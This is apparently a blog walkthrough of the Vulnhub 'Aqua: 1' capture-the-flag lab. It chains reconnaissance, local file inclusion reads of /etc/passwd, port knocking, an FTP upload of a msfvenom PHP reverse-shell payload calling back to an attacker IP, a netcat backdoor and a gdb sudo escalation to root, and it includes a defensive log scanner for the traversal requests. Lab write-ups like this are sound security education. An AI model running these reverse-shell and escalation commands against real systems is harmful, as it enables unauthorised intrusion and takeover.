aqua: 1 walkthrough Vulnhub CTF

Today we are solving another Vulnhub CTF. Aqua: 1 was created by yunaranyanca and is hosted on Vulnhub. You can download it here.

First, we scan our local network to find the target IP.

netdiscover

Nmap aggressive port scan

nmap -A 192.168.1.14

Enumeration

During the dirb scan we found many URLs. I used a filter for .php, so the output shows only entries with the .php extension.

dirb http://192.168.1.14 /usr/share/wordlists/dirb/big.txt -X .php

When I open the target IP in the browser, we find this page.

http://192.168.1.14

When clicking the “Sure, I’ll help” button, we are redirected to another page which shows credentials.

http://192.168.1.14/yes.html

During the dirb scan we found another URL, login.php. I opened the URL and saw a login page. I tried logging in with this credential: vashivmegmin, and we connected successfully.

http://192.168.1.14/login.php

This URL is vulnerable to LFI (local file inclusion); we can see the target system's passwd file.

http://192.168.1.14/home.php?showcase=../../../../etc/passwd

I tried to log in over FTP but got a Connection timed out message. After deeper enumeration I found that a knockd firewall is implemented on this server.

http://192.168.1.14/home.php?showcase=../../../../etc/knockd.conf
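
A defender-side check for the traversal requests shown above, as an added example that is not part of the original walkthrough: it scans web access-log lines for `showcase` values that resolve outside the document root, including percent-encoded variants. The log lines, the `/var/www/html` root and the `about.php` and `img` names are constructed assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

WEB_ROOT = "/var/www/html"  # assumption: the site's document root
PARAM = "showcase"          # include parameter from the walkthrough URLs

# Constructed access-log lines for illustration, not captured from the target.
SAMPLE_LOG = [
    '192.168.1.8 - - [01/Jan/2020:10:00:01 +0000] "GET /home.php?showcase=about.php HTTP/1.1" 200 512',
    '192.168.1.8 - - [01/Jan/2020:10:00:05 +0000] "GET /home.php?showcase=../../../../etc/passwd HTTP/1.1" 200 1833',
    '192.168.1.8 - - [01/Jan/2020:10:00:09 +0000] "GET /home.php?showcase=..%252f..%252f..%252f..%252fetc%252fknockd.conf HTTP/1.1" 200 301',
    '192.168.1.9 - - [01/Jan/2020:10:00:12 +0000] "GET /home.php?showcase=img/../about.php HTTP/1.1" 200 512',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=5):
    """Undo nested percent-encoding (%252f -> %2f -> /)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def escapes_root(value, root=WEB_ROOT):
    """True if the include value resolves to a path outside the web root."""
    value = fully_decode(value).replace("\\", "/").split("\x00")[0]
    resolved = posixpath.normpath(posixpath.join(root, value))
    return not (resolved == root or resolved.startswith(root + "/"))

def suspicious_requests(lines):
    """Return (client_ip, decoded_value) for each request that escapes the root."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        for value in parse_qs(query, keep_blank_values=True).get(PARAM, []):
            if escapes_root(value):
                hits.append((line.split()[0], fully_decode(value)))
    return hits

if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"possible LFI from {ip}: {PARAM}={value}")
```

The same `escapes_root` test, applied before the include instead of after the fact, is the fix: resolve the requested name against the web root and refuse anything that lands outside it.
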
Port knocking

knock 192.168.1.14 1234 5678 9012

Log in with FTP again

ftp 192.168.1.14
  • username: megumin
  • password: watashiwamegumin

With the dir command we see all files in the current directory and their permissions.

dir

Creating a msfvenom php reverse shell payload

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.8 lport=4545 -f raw >/tmp/shell.php

After creating the payload, log in to FTP again with the same username and password. We already saw the directory permissions (757 means the root user has full permissions, other users have the same, and the group can only read and execute).

cd production

This time we upload our shell to the web directory.

put shell.php

We see our shell was uploaded successfully. Now we execute our shell through the LFI (Local File Inclusion) vulnerability.

I had already started msfconsole, and we got a reverse shell on the target machine.

msfconsole

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.8
set lport 4545
run
shell

Now when I run the shell command we see a blank shell, so this time we spawn a bash shell through the Python pty module.

python3 -c 'import pty;pty.spawn("/bin/bash")'

The current user is www-data and has very limited permissions.

id

With the id command we see our current shell user is www-data. We already have the megumin user's password, so I ran the su (Switch User) command for megumin with that password, and our shell changed from www-data to megumin.

su megumin

Let’s check the sudoers entries with sudo -l

sudo -l

We see a backdoor script in the sudoers file. I opened the script with the cat command and saw that it is a bash script that sets up an automatic netcat connection. I ran it with sudo and the backdoor opened.

cat /home/aqua/Desktop/backdoor
sudo /home/aqua/Desktop/backdoor

Connecting to backdoor

nc 192.168.1.14 1337

Again we use the Python pty module to spawn a shell

python -c 'import pty;pty.spawn("/bin/bash")'

I ran the id command and we see our user has changed to aqua. I ran sudo -l again and found many scripts, but I tried gdb privilege escalation.

sudo -l

Privilege Escalation

GDB privilege escalation (more about gdb, see here)

sudo gdb -nx -ex '!bash' -ex quit
cd /root

ls

Reading our last root flag

cat root.txt
About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.